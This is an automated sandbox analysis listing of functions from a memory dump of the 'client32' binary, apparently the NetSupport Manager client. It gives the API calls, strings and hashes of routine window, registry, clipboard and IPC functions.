Function 11131730 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102registrystringmemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\ProductOptions,00000000,00020019,?), ref: 1113176C
RegCloseKey.ADVAPI32(?), ref: 1113181D

Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32 ref: 11143BF0

LocalAlloc.KERNEL32(00000040,1113832B,00000000,?,?,?,?,?,?,?,?,?,?,?,1113832B,Terminal Server), ref: 111317A4
lstrcmpA.KERNEL32(00000000,?), ref: 111317E6
lstrlenA.KERNEL32(00000000), ref: 111317ED
LocalFree.KERNEL32(00000000), ref: 11131808

Strings

ProductSuite, xrefs: 11131787, 111317BD
System\CurrentControlSet\Control\ProductOptions, xrefs: 1113175D

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Local$AllocCloseFreeOpenQueryValuelstrcmplstrlen
String ID: ProductSuite$System\CurrentControlSet\Control\ProductOptions
API String ID: 2999768849-588814233
Opcode ID: 2519e8d1bf1f1312672c33839baea648f7a77d650c12a73db754429def886c69
Instruction ID: 2515fb7f011805fb85e8c25417bcbf5fc72413bf415e28cc1fef82dce871dec7
Opcode Fuzzy Hash: 2519e8d1bf1f1312672c33839baea648f7a77d650c12a73db754429def886c69
Instruction Fuzzy Hash: 323163B6D1425DBFEB11CFA5CD84EAEF7BCAB84619F1441A8E814A3604D730AA0487A5

Function 1101D720 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101D750
GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D76A
_memset.LIBCMT ref: 1101D77A
RegisterClassExA.USER32 ref: 1101D7BB
CreateWindowExA.USER32 ref: 1101D7EE
GetWindowRect.USER32(00000000,?), ref: 1101D7FB
DestroyWindow.USER32 ref: 1101D802

Strings

NSMChatSizeWnd, xrefs: 1101D75C, 1101D7B1, 1101D7E8

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Class_memset$CreateDestroyInfoRectRegister
String ID: NSMChatSizeWnd
API String ID: 2883038198-4119039562
Opcode ID: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
Instruction ID: fd9a6760edc21507823d477136c8404e9cdc8da2703fb475a86e8304a251f150
Opcode Fuzzy Hash: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
Instruction Fuzzy Hash: 8E3130B5D0120DAFDB10DFA5DDC4AEEF7B8FB48218F20452DE82AB6240D7356905CB50

Function 11033470 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97registryclipboardCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 110334CA
_memset.LIBCMT ref: 11033501
RegisterClipboardFormatA.USER32(?), ref: 11033529
GetLastError.KERNEL32 ref: 11033534

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

_memmove.LIBCMT ref: 1103357E

Strings

..\ctl32\clipbrd.cpp, xrefs: 110334A8, 110334E3
(*ppClipData)->pData, xrefs: 110334E8
!*ppClipData, xrefs: 110334AD

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
API String ID: 2414640225-228067302
Opcode ID: a19d5f5c75181924209bb5725fee625b82b0ff7eabefb99c374a3dbc6f3336af
Instruction ID: 82b91b0b5d2de246ea4be34add9884a3f681a3774444f6be8ea8d99c2c4d4bf7
Opcode Fuzzy Hash: a19d5f5c75181924209bb5725fee625b82b0ff7eabefb99c374a3dbc6f3336af
Instruction Fuzzy Hash: C7316F79A00706ABD714DF64C881B6AF3F4FF88708F14C558E9599B341EB71E954CB90

Function 11027040 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000032), ref: 110270E9
GetTickCount.KERNEL32 ref: 110270F7
GetTickCount.KERNEL32(?), ref: 11027107

Strings

IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
HandleIPC ret %x, took %d ms, xrefs: 11027110
Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$Sleep
String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
API String ID: 4250438611-314227603
Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2

Function 11009500 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 1100953A
_strncmp.LIBCMT ref: 1100954A
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110095EB

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
IsA(), xrefs: 110095A5, 110095CD
https://, xrefs: 1100952F
<tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16"> </p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td> </td><td , xrefs: 11009571
http://, xrefs: 11009535, 11009548

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncmp$FileWrite
String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16"> </p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td> </td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
API String ID: 1635020204-3154135529
Opcode ID: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
Opcode Fuzzy Hash: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0

Function 11027450 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetWindowTextA.USER32(?,?,00000080), ref: 11027474
GetClassNameA.USER32(?,?,00000080), ref: 1102749F
GetDlgItem.USER32(?,00000001), ref: 110274C8
GetDlgItem.USER32(?,00000004), ref: 110274CF
GetDlgItem.USER32(?,00000008), ref: 110274DA
PostMessageA.USER32 ref: 110274F6

Strings

#32770, xrefs: 110274AB
Tapiexe, xrefs: 11027480

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Item$ClassMessageNamePostTextWindow
String ID: #32770$Tapiexe
API String ID: 3170390011-3313516769
Opcode ID: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
Instruction ID: 1b12e394e200b75f11f599ec6ab4d64d4751b928bcc344eaa962945fc7b69462
Opcode Fuzzy Hash: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
Instruction Fuzzy Hash: E721BB31E4022D6BEB20DA659D41FDEF7ACEF69709F4000A5F641A61C0DFF56A44CB90

Function 11023390 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetDlgItemTextA.USER32 ref: 110233C2

Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078

SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
GetDlgItem.USER32(?,?), ref: 11023414
SetFocus.USER32 ref: 11023417
GetDlgItem.USER32(00000000,?), ref: 11023445
EnableWindow.USER32(00000000,00000000), ref: 1102344A

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11023433
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1102342E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1605826578-1986719024
Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64

Function 11145120 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1114513D
_memset.LIBCMT ref: 1114515E
GetMenuItemInfoA.USER32 ref: 1114519B
CreatePopupMenu.USER32 ref: 111451AA
GetMenuItemCount.USER32(?), ref: 111451D3
InsertMenuItemA.USER32 ref: 111451E4
GetMenuItemCount.USER32(?), ref: 111451EB

Strings

0, xrefs: 11145177

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
String ID: 0
API String ID: 74472576-4108050209
Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0

Function 110717D0 Relevance: 13.7, APIs: 3, Strings: 6, Instructions: 176COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,B24479DC,750A7F69,750A7D59,?,750A7F69,750A7D59), ref: 11071824
LeaveCriticalSection.KERNEL32(?), ref: 11071838

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110719B1

Strings

Y}u, xrefs: 11071869, 11071993
Y}u, xrefs: 110717EF, 110719BC, 11071840
r->queue != queue, xrefs: 11071915
queue, xrefs: 1107180A
..\ctl32\Connect.cpp, xrefs: 11071805, 11071910
Register NC_CHATEX for conn=%s, q=%p, xrefs: 11071883

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$Y}u$Y}u$queue$r->queue != queue
API String ID: 624642848-515044961
Opcode ID: 3c83a621861238185e4c263f1509ae9a5f7840be0cd4825615d113d4d233f835
Instruction ID: 4c47afc427fc1e2a273e18b082198136771a32f8cb6ee563f570ada24247464b
Opcode Fuzzy Hash: 3c83a621861238185e4c263f1509ae9a5f7840be0cd4825615d113d4d233f835
Instruction Fuzzy Hash: 9B611475E04285AFE701CF64C480FAABBF6FB05314F0485A9E8959B2C1E774E985CBA4

Function 11119BF0 Relevance: 13.7, APIs: 9, Instructions: 154COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 11119C67
MapWindowPoints.USER32 ref: 11119C79
GetSystemMetrics.USER32(00000002), ref: 11119C87
GetSystemMetrics.USER32(00000003), ref: 11119C9F
GetSystemMetrics.USER32(0000004E), ref: 11119CEE
GetSystemMetrics.USER32(0000004F), ref: 11119CF8
GetSystemMetrics.USER32(00000000), ref: 11119D0B
GetSystemMetrics.USER32(00000001), ref: 11119D1E
GetWindowRect.USER32(?,?), ref: 11119D8B

Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 1109599E
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959A7
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959AE
Part of subcall function 11095990: GetSystemMetrics.USER32(00000000,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959B7
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959BD
Part of subcall function 11095990: GetSystemMetrics.USER32(00000001,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959C5

Part of subcall function 11095920: _memset.LIBCMT ref: 1109594F
Part of subcall function 11095920: FreeLibrary.KERNEL32(00000000,?,75097D2F,11119E07,00000002), ref: 1109595A

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsSystem$Window$Rect$FreeLibraryPoints_memset
String ID:
API String ID: 314733930-0
Opcode ID: ffbe80ec5c7be6277551f47d8a5d3bcbf3a975e34dc442d0e2f93cbdde94097c
Instruction ID: 481f58b58db7c1b22ecc32cf71a8a36d2796d8213e8680ad797dec510adba49f
Opcode Fuzzy Hash: ffbe80ec5c7be6277551f47d8a5d3bcbf3a975e34dc442d0e2f93cbdde94097c
Instruction Fuzzy Hash: B4611D71D0065A9FDB24CF64C984BEDF7F5FB48704F0045AAD91AA7284EB74AA84CF90

Function 11037B70 Relevance: 13.6, APIs: 9, Instructions: 149COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 11037BA7

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

_free.LIBCMT ref: 11037BCF
_strncpy.LIBCMT ref: 11037BFB
_strncpy.LIBCMT ref: 11037C38
_malloc.LIBCMT ref: 11037C72
_strncpy.LIBCMT ref: 11037C83
_strncpy.LIBCMT ref: 11037CC3
_malloc.LIBCMT ref: 11037CF6
_strncpy.LIBCMT ref: 11037D0C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
